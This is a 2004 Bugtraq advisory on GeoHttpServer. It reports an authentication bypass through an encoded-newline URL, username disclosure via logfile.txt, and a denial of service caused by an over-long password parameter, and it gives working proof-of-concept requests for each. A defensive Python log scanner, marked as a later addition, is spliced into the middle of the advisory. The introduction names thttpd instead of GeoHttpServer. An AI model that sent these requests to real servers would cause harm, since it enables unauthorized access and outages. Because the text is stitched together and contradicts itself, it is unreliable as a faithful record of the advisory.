GeoHttpServer Authentication Bypass Vulnerability & D.O.S (Denial Of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Thu, 22 Jan 2004 19:23:16 +0200

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Software: GeoHttpServer
    Vendor: GEOVISION INC
                            http://www.geovision.com.tw
    Versions: ALL
    Platforms: Unix
    Bug: Authentication Bypass Vulnerability & D.O.S (Denial Of Service)
    Risk: High
    Exploitation: Remote with browser
    Date: 22 Jan 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    thttpd is a free "Open Source" webserver that comes by default with Unix
    systems such as FreeBSD and Linux.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    The GeoHttpServer security is pretty good. Some users, who understand what
    they are doing, configure the server to authenticate login attempts.

    The server uses this authentication code:
    **********************************************
    <html><head><title>Login In</title>
    </head><body><center>
    <form method="POST" action="phoneinfo">User Name:</BR>
      <input type="id" name="id" size="10"><p></p>
      Password:</BR>
      <input type="password" name="pwd" size="10">
      <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
      <input type="radio" name="ImageType" value="2">GIF</p>
      <p><input type="submit" name="send" value="Submit"><input type="reset"
    name="CANCEL" value="Cancel"></center><center><br>
      </p>
    </form>
    </center>
    </body>
    </html>
    **********************************************

    Amazingly, http://>/%0a%0a bypasses it: you get the GeoHttpServer default
    main page.

    The main page leads to functions that also require authentication. In
    order to retrieve a user name we can go to http://>/logfile.txt, which
    generally contains the last logins and usernames. In most cases the
    password will be the same as the user name.

    In addition there is an authentication form inside the server that
    requires a name and a password in order to see the server info/config.
    Manipulating these links can cause a Denial Of Service of the server.

    P.O.C(Proof Of Concept):
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa
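    As an added, defender-side illustration (this is not part of the original advisory and not GeoVision code): a small Python log scanner that flags, over a few constructed Common Log Format lines, the two request patterns described above, namely percent-encoded CR/LF in the request path and an over-long pwd parameter sent to sysinfo, and additionally any retrieval of logfile.txt. The log format, the host addresses, the 64-byte parameter threshold and the sensitive-path list are assumptions chosen for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access log (Common Log Format). Hosts and timestamps are made up;
# the third line mimics the advisory's over-long pwd value with a 300-byte run of "a".
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2004:19:23:16 +0200] "GET /%0a%0a HTTP/1.0" 200 1532
10.0.0.5 - - [22/Jan/2004:19:23:40 +0200] "GET /logfile.txt HTTP/1.0" 200 880
10.0.0.7 - - [22/Jan/2004:19:24:02 +0200] "GET /sysinfo?id=TheInsider&pwd=killed{a} HTTP/1.0" 500 0
10.0.0.9 - - [22/Jan/2004:19:25:10 +0200] "GET /index.htm HTTP/1.0" 200 2048
10.0.0.9 - - [22/Jan/2004:19:25:30 +0200] "POST /phoneinfo HTTP/1.0" 200 512
""".format(a="a" * 300)

# Minimal CLF parser: host, timestamp, method, request-target, status.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed threshold: the login form declares size="10" fields, so anything far
# beyond that is not a legitimate credential. Tune to the deployment.
MAX_PARAM_LEN = 64

# Assumed list of paths whose retrieval should be reviewed, since the advisory
# reports that logfile.txt discloses recent logins and usernames.
SENSITIVE_PATHS = {"/logfile.txt"}

# ASCII control characters (includes CR, LF) that never belong in a decoded path.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')


def inspect_request(target):
    """Return a list of finding strings for one request-target (path + query)."""
    findings = []
    parts = urlsplit(target)
    decoded_path = unquote(parts.path)  # %0a%0a -> "\n\n"
    if CONTROL_CHARS.search(decoded_path):
        findings.append("control character (e.g. encoded CR/LF) in request path")
    if decoded_path in SENSITIVE_PATHS:
        findings.append(f"request for sensitive path {decoded_path!r}")
    # parse_qsl percent-decodes values, so length and content checks see the raw bytes.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) > MAX_PARAM_LEN:
            findings.append(f"oversized parameter {name!r} ({len(value)} bytes)")
        if CONTROL_CHARS.search(value):
            findings.append(f"control character in parameter {name!r}")
    return findings


def scan_log(text):
    """Scan CLF text; return (host, target, findings) for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        findings = inspect_request(m.group("target"))
        if findings:
            alerts.append((m.group("host"), m.group("target"), findings))
    return alerts


if __name__ == "__main__":
    for host, target, findings in scan_log(SAMPLE_LOG):
        print(host, target[:60], "->", "; ".join(findings))
```

    The same checks belong in front of the server as well: a reverse proxy or WAF rule that rejects decoded control characters in the path and caps parameter lengths blocks both request shapes before they reach GeoHttpServer.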

    Another D.O.S caused by the server is an Internet Explorer D.O.S: when
    someone is watching a video stream from the server and presses the
    reconnect button, I.E has an overflow.
    Internet Explorer Version: 6.0.2600.0
    Module Stuck: msxml3.dll
    Module Version: 8.20.9415.0
    Offset: 00013ed6

    http://theinsider.deep-ice.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Authentication Bypass - http://>/%0a%0a bypasses it!
    Denial Of Service -
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Things that are unlikeable, are NOT impossible."